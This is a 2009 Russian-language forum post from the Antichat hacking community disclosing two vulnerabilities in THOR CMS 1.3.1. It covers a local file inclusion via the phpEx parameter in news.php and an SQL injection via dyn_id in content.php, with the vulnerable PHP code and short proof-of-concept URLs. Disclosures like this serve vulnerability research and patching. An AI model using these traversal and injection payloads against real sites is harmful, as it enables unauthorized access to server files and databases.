HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

THOR CMS VERSION 1.3.1
  #11  
Старый 20.11.2009, 04:08
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию THOR CMS VERSION 1.3.1
THOR CMS VERSION 1.3.1

CMS - каким то кривым образом сделана на основе phpbb, а может и является ему дополнением (руки б оторвать тому кто его писал).

Local File Include in news.php:

register_globals = ON

PHP код:
...
include($phpbb_root_path 'common.'.$phpEx);
... 
PoC:

Код:
http://localhost/24/news.php?phpEx=./../FILE
SQL injection in content.php:

PHP код:
...
$dyn_id $HTTP_GET_VARS['dyn_id'];
$sql "SELECT * FROM " CMS_DYN " WHERE id = ".$dyn_id."";
... 
PoC:

Код:
http://localhost/24/content.php?dyn_id=[SQL]
CMS VERSION:

Код:
http://localhost/24/readme.txt
Обычно этот файл НЕ удаляют!
Последний раз редактировалось Ins3t; 20.11.2009 в 23:21..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.